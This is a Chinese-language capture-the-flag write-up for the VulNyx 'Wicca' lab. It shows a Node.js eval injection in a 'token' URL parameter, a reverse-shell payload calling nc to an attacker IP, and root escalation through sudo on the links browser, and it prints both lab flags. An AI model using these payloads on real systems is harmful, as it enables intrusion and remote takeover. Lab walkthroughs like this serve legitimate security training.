vulnyx Wicca writeup
信息收集arp-scan
nmap
获取userFlag
80端口仍然只是一个apache的默认页面,没有什么东西,我们直接去看5000端口
随便输入点东西
url上多了两个参数,name和token,这里我们可以先通过whatweb看一下中间件什么的
可以看到后端框架用的是Express,也就是说目标服务器是nodejs的。回过头来测试以下之前的两个参数,name的话测试下来页面都没什么反应,但是在token这里我输入了一个a引发了一个报错:
根据报错信息可以得到目标后端在token这里使用了eval函数,eval在nodejs中的作用就是可以执行任意的js代码,所以这里我们就可以通过这个点来反弹shell了。具体的js代码怎么写呢?学过的话当然不用说,没学过的话可以自己上网搜,可以给AI,也可以利用:www.revshells.com
这里我就通过revshells这个网站来拿到反弹shell的js代码
可以看到js代码已经给出来了,然后就可以拿着它去token字段那里执行了
require('child_process').exec('nc -e /bin/bash 192.168.43.180 8888')
然后到家目录下就可以拿到userflag了
userflag:VulNyx{d9f213df08ea2b3bf6cc90be28fa827f}
获取rootFlag
sudo -l 看一下
发现可以通过root的身份执行links命令,这个links是一个文本浏览器,这里我展示以下通过它获取rootflag的两种方式,当然方法可能不止这两种,这里我只是演示我尝试过的路径而已
方法一:任意文件读取
sudo -u root links /root/root.txt
这样就拿到rootflag了
方法二:获取root shell
通过links任意打开一个文件,或者直接执行links
sudo -u root links然后按下ESC
Enter选择第一个File选项
然后选择下面的 OS shell 选项即可拿到rootshell
rootflag:VulNyx{dab686b0ee76b5edf6fc317c51d6f102}
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]